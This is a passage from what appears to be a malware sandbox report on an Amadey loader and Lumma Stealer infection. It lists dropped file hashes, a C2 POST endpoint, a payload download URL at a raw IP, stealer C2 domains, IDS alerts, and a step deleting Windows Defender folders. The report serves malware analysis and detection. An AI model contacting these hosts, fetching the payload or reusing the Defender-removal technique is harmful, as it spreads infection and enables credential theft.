MD5:D6A202BB8E3765C2B111CDC87BD2F877 | SHA256:12A8DCDCBBED85AB51429F93FCD51B72DCE1110CB3FC0942B6D1873567E0643B | |||
| 3388 | 1uP5ZkiR.exe | C:\Windows\Tasks\ramez.job | binary | |
MD5:45F7B248AEEED982B34B2025E319F009 | SHA256:8F6699775B166F1A8CC28E0C24952871E9D151434DDC4CB07831BFDCFE999568 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\7z.exe | executable | |
MD5:426CCB645E50A3143811CFA0E42E2BA6 | SHA256:CF878BFBD9ED93DC551AC038AFF8A8BBA4C935DDF8D48E62122BDDFDB3E08567 | |||
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\pJNMEHWu.exe | executable | |
MD5:426CCB645E50A3143811CFA0E42E2BA6 | SHA256:CF878BFBD9ED93DC551AC038AFF8A8BBA4C935DDF8D48E62122BDDFDB3E08567 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\cecho.exe | executable | |
MD5:E783BC59D0ED6CFBD8891F94AE23D1B3 | SHA256:5C1211559DDA10592CFEDD57681F18F4A702410816D36EDA95AEE6C74E3C6A47 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\Work\NSudoLG.exe | executable | |
MD5:423129DDB24FB923F35B2DD5787B13DD | SHA256:5094AD359D8CF6DC5324598605C35F68519CC5AF9C7ED5427E02A6B28121E4C7 | |||
| 3388 | 1uP5ZkiR.exe | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 2148 | nIkiflBG.exe | C:\Users\admin\AppData\Local\Temp\ARB9K2W.bat | text | |
MD5:F06B802A647D148B7104E382DC0B7ED8 | SHA256:C4B0E7467D03AB117A70EB53478AD27F4E3795678519EBF352D1550A9CB12D1D | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4708 | RUXIMICS.exe | GET | 200 | 2.18.121.139:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4708 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4372 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | unknown |
4372 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | unknown |
— | — | GET | 200 | 23.197.130.99:443 | https://steamcommunity.com/profiles/76561199861614181 | unknown | html | 29.0 Kb | whitelisted |
4372 | ramez.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/files/7700188128/RYNH1rZ.exe | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1268 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4708 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
1268 | svchost.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
4708 | RUXIMICS.exe | 2.18.121.139:80 | crl.microsoft.com | AKAMAI-AS | FR | whitelisted |
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
narrathfpt.top |
| unknown |
escczlv.top |
| unknown |
localixbiw.top |
| unknown |
korxddl.top |
| unknown |
stochalyqp.xyz |
| unknown |
diecam.top |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
4372 | ramez.exe | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |
4372 | ramez.exe | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Response |
4372 | ramez.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
4372 | ramez.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
4372 | ramez.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
4372 | ramez.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (korxddl .top) |
2200 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (peppinqikp .xyz) |
2200 | svchost.exe | Domain Observed Used for C2 Detected | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (citellcagt .top) |
Process | Message |
|---|---|
rZBRvVk.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
IObitUnlocker.exe | PostAction_Delete |
IObitUnlocker.exe | FileCount:46 |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Defender-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Windows Security Health-------- |
IObitUnlocker.exe | C:\ProgramData\Microsoft\Storage Health-------- |
IObitUnlocker.exe | C:\Program Files\Windows Defender-------- |
IObitUnlocker.exe | C:\Program Files\Windows Defender Advanced Threat Protection-------- |
IObitUnlocker.exe | C:\Program Files\Windows Security-------- |